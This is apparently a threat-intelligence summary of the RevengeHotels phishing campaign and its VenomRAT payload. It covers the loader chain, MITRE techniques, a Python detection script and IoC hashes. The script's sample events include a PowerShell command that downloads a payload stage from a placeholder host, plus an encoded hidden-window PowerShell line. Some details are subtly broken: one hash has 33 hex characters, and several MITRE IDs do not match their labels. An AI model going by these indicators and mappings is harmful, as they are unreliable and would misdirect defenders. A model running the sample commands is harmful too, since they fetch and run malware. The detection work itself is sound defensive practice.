RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT


RevengeHotels (TA558) runs targeted phishing campaigns against hotels—primarily in Brazil—using invoice- and job-themed lures to deliver multi-stage loaders that ultimately deploy VenomRAT and other RAT families. The group increasingly leverages LLM-generated code for initial loaders and abuses legitimate hosting and Portuguese-themed domains for payload delivery. #RevengeHotels #VenomRAT

Key points

  • RevengeHotels (TA558) targets hotels and front-desk personnel with phishing emails themed as invoices, booking confirmations, or fake job applications.
  • Initial infection uses phishing links to websites that download WScript JS files (e.g., Fat{NUMBER}.js) which act as loaders.
  • Loaders decode and save PowerShell scripts (SGDoHBZQWpLKXCAoTHXdBGlnQJLZCGBOVGLH_{TIMESTAMP}.ps1) that fetch Base64-encoded components: venumentrada.txt (loader) and runpe.txt (VenomRAT payload).
  • A significant portion of the new initial infector code appears generated by LLM agents, identifiable by clean structure, extensive comments, placeholders, and lack of obfuscation.
  • VenomRAT (an evolution of QuasarRAT) provides HVNC, file grabber/stealer, reverse proxy, UAC exploit, anti-kill, persistence mechanisms, ngrok tunneling, USB spreading, and defenses against Windows Defender.
  • VenomRAT implements anti-kill by modifying process DACLs, terminating analyst/security processes, setting SeDebugPrivilege/RtlSetProcessIsCritical (if admin), and preventing sleep via SetThreadExecutionState.
  • The campaign uses legitimate hosting services and rotating Portuguese-themed domains; primary victims remain hotels in Brazil with expansion into Spanish-speaking markets.

MITRE Techniques

  • [T1566] Phishing – Threat actor sends targeted invoicing and job-application emails with links to malicious sites that download script files (“phishing emails with invoicing themes, which urge the recipient to settle overdue payments”).
  • [T1204.002] User Execution: Malicious File – Victims execute WScript JS files downloaded from malicious sites (e.g., Fat{NUMBER}.js) that start the infection chain (“download a WScript JS file upon being visited, triggering the infection process”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Loader saves and executes a PowerShell script (SGDoHBZQ…_{TIMESTAMP}.ps1) that runs Base64-encoded commands to retrieve subsequent payloads (“runs a PowerShell command with Base64-encoded code. This code retrieves the cargajecerrr.txt file from a remote malicious server and invokes it as PowerShell”).
  • [T1105] Ingress Tool Transfer – Downloader fetches Base64-encoded files venumentrada.txt and runpe.txt from remote servers and decodes them for execution (“fetching the remaining files from the malicious server and loading them. Both downloaded files are Base64-encoded and have descriptive names: venumentrada.txt … and runpe.txt”).
  • [T1569.002] System Services: Service Execution (ngrok tunnel installation) – VenomRAT installs ngrok and receives tunnel parameters from C2 to expose remote services (RDP/VNC) to the internet (“VenomRAT implements tunneling by installing ngrok on the infected computer … token, protocol, and port for the tunnel”).
  • [T1106] Native API – VenomRAT modifies process security descriptors and calls native APIs to set SeDebugPrivilege and RtlSetProcessIsCritical for persistence (“sets the SeDebugPrivilege token, enabling it to use the RtlSetProcessIsCritical function to mark itself as a critical system process”).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence via VBS that creates a RunOnce registry entry to relaunch the malware (“creates a new key under HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce, pointing to the executable path”).
  • [T1490] Inhibit System Recovery/Defense Evasion: Clear Windows Event Logs – Malware clears Windows event logs to hinder detection and forensic analysis (“clears all Windows event logs on the compromised system, effectively creating a ‘clean slate’ for its operations”).
  • [T1070.004] Indicator Removal on Host: File Deletion (Zone.Identifier) – VenomRAT deletes Zone.Identifier streams to remove Mark of the Web metadata and evade defenses (“deletes the Mark of the Web streams … avoid being quarantined”).
  • [T1021.002] Remote Services: SMB/Windows Admin Shares (USB/Removable Media propagation) – Malware copies itself to removable drives under “My Pictures.exe” to spread via USB drives (“scans drive letters from C to M … copies itself to all available drives under the name My Pictures.exe”).
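As an added example (not code from the original write-up or from the threat actor), the Python below turns the infection chain in the key points and the MITRE list above into a small detection pass: each rule keys on an artifact named in the report (the Fat{NUMBER}.js loader, the long .ps1 stage name, the venumentrada/runpe/cargajecerrr stage files, the RunOnce key, the “My Pictures.exe” USB copy) and is run over constructed, Sysmon-style sample events. The event shape, the sample paths and the 203.0.113.10 placeholder host are assumptions, not values from the campaign.

```python
import re

# Constructed sample telemetry in a simplified Sysmon-like shape (not real logs);
# the file names and the registry key match those reported for this campaign.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\frontdesk\Downloads\Fat146571.js"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Users\frontdesk\AppData\Local\Temp\SGDoHBZQWpLKXCAoTHXdBGlnQJLZCGBOVGLH_1725170000.ps1"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand aQBlAHgAIAAoAC4ALgAuACkA"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c iwr http://203.0.113.10/venumentrada.txt"},  # placeholder host
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Update",
     "value": r"C:\Users\frontdesk\AppData\Roaming\update.exe"},
    {"type": "file", "path": r"E:\My Pictures.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe shift.txt"},
]

# Each rule: (name, MITRE id as given in the write-up, event type, field, compiled regex).
RULES = [
    ("wscript_fat_js_loader", "T1204.002", "process", "cmdline",
     re.compile(r"(?i)\b[wc]script\.exe\b.*\bFat\d+\.js\b")),
    ("powershell_stage_script", "T1059.001", "process", "cmdline",
     re.compile(r"SGDoHBZQWpLKXCAoTHXdBGlnQJLZCGBOVGLH_\d+\.ps1")),
    ("powershell_encoded_command", "T1059.001", "process", "cmdline",
     re.compile(r"(?i)powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("stage_payload_name", "T1105", "process", "cmdline",
     re.compile(r"(?i)\b(cargajecerrr|venumentrada|runpe)\.txt\b")),
    ("runonce_persistence", "T1547.001", "registry", "key",
     re.compile(r"(?i)^HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\")),
    ("removable_media_copy", "T1021.002", "file", "path",
     re.compile(r"(?i)^[D-M]:\\My Pictures\.exe$")),
]

def detect(events):
    """Return (rule_name, mitre_id, event_index) for every rule that fires on an event."""
    hits = []
    for idx, ev in enumerate(events):
        for name, tid, etype, field, rx in RULES:
            if ev.get("type") == etype and rx.search(ev.get(field, "")):
                hits.append((name, tid, idx))
    return hits

if __name__ == "__main__":
    for name, tid, idx in detect(SAMPLE_EVENTS):
        print(f"[{tid}] {name}: event #{idx}")
```

The regexes are deliberately anchored on campaign-specific names; in production the generic ones (encoded PowerShell, RunOnce writes, executables created on removable drives) are the ones worth keeping after the named artifacts rotate.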

Indicators of Compromise

  • [File Hash] initial JS and scripts – fbadfff7b61d820e3632a2f464079e8c (Fat146571.js), d5f241dee73cffe51897c15f36b713cc (SGDoHBZQ…_{TIMESTAMP}.ps1).
  • [File Hash] downloader and payload files – 607f64b56bb3b94ee0009471f1fe9a3c (venumentrada.txt), dbf5afa377e3e761622e5f21af1f09e6 (runpe.txt), 3ac65326f598ee9930031c17ce158d3d (VenomRAT implant).
  • [File Name] decoded resource names – cargajecerrr.txt (remote PowerShell stage), venumentrada.txt (VenomRAT entry loader), runpe.txt (in-memory execution payload).
  • [File Hash] deobfuscated artifacts – 91454a68ca3a6ce7cb30c9264a88c0dc (deobfuscated runpe.txt), 11077ea936033ee9e9bf444dafb55867c (cargajecerrr.txt original mapping), b1a5dc66f40a38d807ec8350ae89d1e4 (cargajecerrr.txt referenced hash).

Read more: https://securelist.com/revengehotels-attacks-with-ai-and-venomrat-across-latin-america/117493/